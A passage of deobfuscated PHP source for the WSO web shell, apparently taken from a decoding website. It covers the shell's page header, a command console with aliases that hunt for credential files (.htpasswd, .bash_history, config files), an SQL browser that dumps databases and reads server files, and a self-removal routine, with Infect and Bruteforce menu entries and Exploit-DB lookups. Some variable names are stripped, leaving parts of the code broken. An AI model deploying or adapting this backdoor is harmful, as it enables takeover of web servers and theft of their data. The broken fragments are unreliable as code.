"Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => '', "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto Oda8Q; oh1bD: function hardHeader() { if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["\xe2\226\x9c"]; } echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . "'><title>" . $_SERVER["HTTP_HOST"] . " - WSO " . VERSION . "</title>
    <link href='https://fonts.googleapis.com/css?family=Nunito' rel='stylesheet'>
    <link rel='stylesheet' href='https://cdn.rawgit.com/kimeiga/bahunya/css/bahunya-0.1.3.css'>\xa<style>
\x9body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}\xa	#particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(''); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}\xa\x9body,td,th\x9{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
\x9table.info	{color:#C3C3C3;}
	table#toolsTbl {background-color: #060A10;}
\x9span,h1,a\x9{color:#68b723 !important;}\xa\x9span\x9	{font-weight:bolder;}\xa	h1	\x9\x9{border-left:5px solid #a10705;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}\xa	div.content	{padding:5px;margin-left:5px;background-color:#060a10;}\xa\x9a	\x9	{text-decoration:none;}
	a:hover\x9	{text-decoration:underline;}
\x9.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
	.tooltip:hover::after {opacity:1;visibility:visible;}\xa	.ml1\x9	{border:1px solid #202832;padding:5px;margin:0;overflow:auto;}\xa	.bigarea	{min-width:100%;max-width:100%;height:400px;}
	input, textarea, select	{margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:none;}\xa	label {position:relative}
\x9label:after{border-bottom:2px solid #999;border-right:2px solid #999;content:'';display:block;height:5px;margin-top:-4px;pointer-events:none;position:absolute;right:12px;top:50%;-webkit-transform-origin:66% 66%;-ms-transform-origin:66% 66%;transform-origin:66% 66%;-webkit-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg);-webkit-transition:all .15s ease-in-out;transition:all .15s ease-in-out;width:5px}\xa\x9label:before {content:'';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}
	form		{margin:0px;}\xa	#toolsTbl\x9{text-align:center;}\xa\x9#fak 	\x9{background:none;}
	#fak td 	{padding:5px 0 0 0;}\xa\x9iframe\x9\x9{border:1px solid #060a10;}\xa	.toolsInp\x9{width:300px}
\x9.main th\x9{text-align:left;background-color:#060a10;}
	.main tr:hover{background-color:#354252;}
	.main td, th{vertical-align:middle;}\xa\x9input[type='submit']{background-color:#0d52bf; color:#fafafa;}\xa	input[type='button']{background-color:#0d52bf; color:#fafafa;}
	input[type='submit']:hover{background-color:#002e99; color:#fafafa;}
	input[type='button']:hover{background-color:#002e99; color:#fafafa;}\xa	.l1	\x9	{background-color:#202832;}\xa\x9pre	\x9\x9{font:9pt Courier New;}\xa</style>\xa<script>\xa    var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';
    var a_ = '" . htmlspecialchars(@$_POST["a"]) . "'
    var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "';
    var p1_ = '" . (strpos(@$_POST["p1"], "\xa") !== false ? '' : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "';\xa    var p2_ = '" . (strpos(@$_POST["p2"], "\xa") !== false ? '' : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "';\xa    var p3_ = '" . (strpos(@$_POST["p3"], "\xa") !== false ? '' : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "';\xa    var d = document;
\x9function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
\x9function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}\xa\x9function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}\xa	function set(a,c,p1,p2,p3,charset) {
	\x9if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\xa		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\xa\x9	if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
\x9\x9if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
\x9\x9if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\xa\x9	d.mf.a.value = encrypt(d.mf.a.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');\xa\x9\x9d.mf.c.value = encrypt(d.mf.c.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');\xa\x9\x9d.mf.p1.value = encrypt(d.mf.p1.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');
	\x9d.mf.p2.value = encrypt(d.mf.p2.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');
\x9\x9d.mf.p3.value = encrypt(d.mf.p3.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');\xa	\x9if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\xa	}\xa	function g(a,c,p1,p2,p3,charset) {\xa\x9	set(a,c,p1,p2,p3,charset);\xa		d.mf.submit();\xa	}
\x9function a(a,c,p1,p2,p3,charset) {
\x9	set(a,c,p1,p2,p3,charset);\xa		var params = 'ajax=true';\xa	\x9for(i=0;i<d.mf.elements.length;i++)\xa			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\xa\x9	sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);\xa\x9}\xa\x9function sr(url, params) {\xa		if (window.XMLHttpRequest)
			req = new XMLHttpRequest();\xa	\x9else if (window.ActiveXObject)
\x9		req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {\xa            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\xa            req.send(params);\xa        }\xa	}\xa	function processReqChange() {\xa\x9	if( (req.readyState == 4) )
	\x9\x9if(req.status == 200) {\xa		\x9	var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
\x9\x9	\x9var arr=reg.exec(req.responseText);\xa\x9\x9	\x9eval(arr[2].substr(0, arr[1]));
\x9\x9	} else alert('Request error!');
	}
</script>
<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>
<form method=post name=mf style='display:none;'>\xa<input type=hidden name=a>\xa<input type=hidden name=c>\xa<input type=hidden name=p1>\xa<input type=hidden name=p2>\xa<input type=hidden name=p3>\xa<input type=hidden name=charset>
</form>"; $freeSpace = @diskfreespace($GLOBALS["cwd"]); $totalSpace = @disk_total_space($GLOBALS["cwd"]); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname("r"); $kernel = @php_uname("s"); $explink = "http://nullrefer.com/?https://www.exploit-db.com/search/?action=search&description="; if (strpos("Linux", $kernel) !== false) { $explink .= urlencode("Linux Kernel " . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . " " . substr($release, 0, 3)); } if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } $cwd_links = ''; $path = explode("/", $GLOBALS["cwd"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g("FilesMan",""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; } $cwd_links .= "")'>" . $path[$i] . "/</a>"; } $charsets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); $opt_charsets = ''; foreach ($charsets as $) { $opt_charsets .= "<option value="" . $ . "" " . ($_POST["charset"] == $ ? "selected" : '') . ">" . $ . "</option>"; } $m = array("Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Infect" => "Infect", "Sql" => "Sql", "Php" => "Php", "Safe mode" => "SafeMode", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network"); if (!empty($GLOBALS["\xe2\226\x9b"])) { $m["Logout"] = "Logout"; } $m["Self remove"] = "SelfRemove"; $menu = ''; foreach ($m as $k => $v) { $menu .= "<th>[ <a href="#" onclick="g('" . $v . "',null,'','','')">" . $k . "</a> ]</th>"; } $drives = ''; if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "<a href="#" onclick="g('FilesMan','" . $drive . ":/')">[ " . $drive . " ]</a> "; } } } echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" . ($GLOBALS["os"] == "win" ? "<br>Drives:" : '') . "</span></td>" . "<td><nobr>" . substr(@php_uname(), 0, 120) . " <a href="https://nullrefer.com/?https://www.google.com/search?q=" . urlencode(@php_uname()) . "" target="_blank">[ Google ]</a> <a href="" . $explink . "" target=_blank>[ Exploit-DB ]</a></nobr><br>" . $uid . " ( " . $user . " ) <span>Group:</span> " . $gid . " ( " . $group . " )<br>" . @phpversion() . " <span>Safe mode:</span> " . ($GLOBALS["safe_mode"] ? "<font color=#a10705>ON</font>" : "<font color=#f9c440><b>OFF</b></font>") . " <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . viewSize($totalSpace) . " <span>Free:</span> " . viewSize($freeSpace) . " (" . round(100 / ($totalSpace / $freeSpace), 2) . "%)<br>" . $cwd_links . " " . viewPermsColor($GLOBALS["cwd"]) . " <a href=# onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . $drives . "</td>" . "<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">" . $opt_charsets . "</select></label><br><span>Server IP:</span><br>" . gethostbyname($_SERVER["HTTP_HOST"]) . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="background-color:#0d52bf;" cellpadding=3 cellspacing=0 width=100%><tr>" . $menu . "</tr></table><div>"; } goto OWR26; rGxXC: function actionSql() { class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } break; case "pgsql": $host = explode(":", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysql_query($str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "mysql": return @mysql_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysql_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql_set_charset")) { return @mysql_set_charset($str, $this->link); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '" . addslashes($str) . "';select file from hard2;"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["file"]; } $this->query("drop table hard2"); return array("file" => implode("\xa", $r)); break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); $create = mysql_fetch_array($res); $sql = $create[1] . ";
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query("SELECT * FROM `" . $table . "`"); $i = 0; $head = true; while ($ = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = ";\xa\xa"; } $columns = array(); foreach ($ as $k => $v) { if ($v === null) { $[$k] = "NULL"; } elseif (is_int($v)) { $[$k] = $v; } else { $[$k] = "'" . @mysql_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES \xa	(" . implode(", ", $) . ")"; $head = false; } else { $sql .= "\xa\x9,(" . implode(", ", $) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } if (!$head) { if ($fp) { fwrite($fp, ";

"); } else { echo ";

"; } } break; case "pgsql": $this->query("SELECT * FROM " . $table); while ($ = $this->fetch()) { $columns = array(); foreach ($ as $k => $v) { $[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $) . ");" . "
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["type"]); if (@$_POST["p2"] == "download" && @$_POST["p1"] != "select") { $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); $db->selectdb($_POST["sql_base"]); switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } if (empty($_POST["file"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach ($_POST["tbl"] as $v) { $db->dump($v); } die; } elseif ($fp = @fopen($_POST["file"], "w")) { foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["p2"]); } else { die("<script>alert("Error! Can't open file");window.history.back(-1)</script>"); } } hardHeader(); echo "
<h1>Sql browser</h1><div class=content>\xa<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\xa<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xa<td><label><select name='type'><option value='mysql' "; if (@$_POST["type"] == "mysql") { echo "selected"; } echo ">MySql</option><option value='pgsql' "; if (@$_POST["type"] == "pgsql") { echo "selected"; } echo ">PostgreSql</option></select></label></td>\xa<td><input type=text name=sql_host value="" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . ""></td>\xa<td><input type=text name=sql_login value="" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . ""></td>\xa<td><input type=text name=sql_pass value="" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . "" required></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } $db->listDbs(); echo "<label><select name=sql_base><option value=''></option>"; while ($ = $db->fetch()) { list($key, $value) = each($); echo "<option value="" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . ">" . $value . "</option>"; } echo "</select></label>"; } else { echo $tmp; } } else { echo $tmp; } echo "</td>
		\x9\x9<td><input type=submit value='submit' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST["sql_count"]) ? '' : " checked") . "> count the number of rows</td>\xa\x9	\x9</tr>\xa		</table>\xa	\x9<script>\xa            s_db='" . @addslashes($_POST["sql_base"]) . "';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xa                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
\x9	\x9function st(t,l) {
\x9			d.sf.p1.value = 'select';
	\x9	\x9d.sf.p2.value = t;\xa                if(l && d.sf.p3) d.sf.p3.value = l;
	\x9		d.sf.submit();\xa\x9\x9\x9}
\x9	\x9function is() {\xa\x9\x9	\x9for(i=0;i<d.sf.elements['tbl[]'].length;++i)\xa	\x9	\x9	d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\xa\x9\x9\x9}\xa		</script>"; if (isset($db) && $db->link) { echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if (!empty($_POST["sql_base"])) { $db->selectdb($_POST["sql_base"]); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while ($ = $db->fetch($tbls_res)) { list($key, $value) = each($); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? "&nbsp;" : " <small>({$n["n"]})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if (@$_POST["p1"] == "select") { $_POST["p1"] = "query"; $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; $db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]); $num = $db->fetch(); $pages = ceil($num["n"] / 30); echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; echo " of {$pages}"; if ($_POST["p3"] > 1) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>&lt; Prev</a>"; } if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next &gt;</a>"; } $_POST["p3"]--; if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } echo "<br><br>"; } if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { $title = false; echo "<table width=100% cellspacing=1 cellpadding=2 class=main>"; $line = 1; while ($ = $db->fetch()) { if (!$title) { echo "<tr>"; foreach ($ as $key => $value) { echo "<th>" . $key . "</th>"; } reset($); $title = true; echo "</tr><tr>"; $line = 2; } echo "<tr class="l" . $line . "">"; $line = $line == 1 ? 2 : 1; foreach ($ as $key => $value) { if ($value == null) { echo "<td><i>null</i></td>"; } else { echo "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } echo "</tr>"; } echo "</table>"; } else { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } } echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='submit'></form>"; } } if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "<br/><pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } } else { echo htmlspecialchars($db->error()); } echo "</div>"; hardFooter(); } goto et3or; hwJg4: @ini_set("log_errors", 0); goto gkT1m; WJp40: $home_cwd = @getcwd(); goto YIyjV; G6Uv3:  
Did this file decode correctly? 
Original Code 
goto r3B2Y; Oda8Q: function actionConsole() { if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0); } if (isset($_POST["ajax"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); echo "d.cf.cmd.value='';
"; $temp = @iconv($_POST["charset"], "UTF-8", addcslashes("
$ " . $_POST["p1"] . "
" . ex($_POST["p1"]), "
\xd\x9\'\0")); if (preg_match("!.*cd\s+([^;]+)$!", $_POST["p1"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } echo "d.cf.output.value+='" . $temp . "';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "
", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } hardHeader(); echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);\xavar cmds = new Array('');
var cur = 0;
function kp(e) {
\x9var n = (window.Event) ? e.which : e.keyCode;
\x9if(n == 38) {
	\x9cur--;\xa	\x9if(cur>=0)
\x9\x9	document.cf.cmd.value = cmds[cur];\xa	\x9else\xa\x9\x9\x9cur++;\xa	} else if(n == 40) {\xa	\x9cur++;\xa\x9	if(cur < cmds.length)\xa\x9		document.cf.cmd.value = cmds[cur];
\x9\x9else
	\x9\x9cur--;
\x9}
}
function add(cmd) {\xa\x9cmds.pop();\xa	cmds.push(cmd);
\x9cmds.push('');\xa\x9cur = cmds.length-1;\xa}
</script>"; echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><label><select name=alias>"; foreach ($GLOBALS["aliases"] as $n => $v) { if ($v == '') { echo "<optgroup label="-" . htmlspecialchars($n) . "-"></optgroup>"; continue; } echo "<option value="" . htmlspecialchars($v) . "">" . $n . "</option>"; } echo "</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["p2"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : '') . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>"; if (!empty($_POST["p1"])) { echo htmlspecialchars("$ " . $_POST["p1"] . "\xa" . ex($_POST["p1"])); } echo "</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>"; echo "</form></div><script>d.cf.cmd.focus();</script>"; hardFooter(); } goto xWgYK; asFIH: function actionSelfRemove() { if ($_POST["p1"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("Shell has been removed"); } else { echo "unlink error!"; } } if ($_POST["p1"] != "yes") { hardHeader(); } echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>"; hardFooter(); } goto eHsyk; gS860: function perms($p) { if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 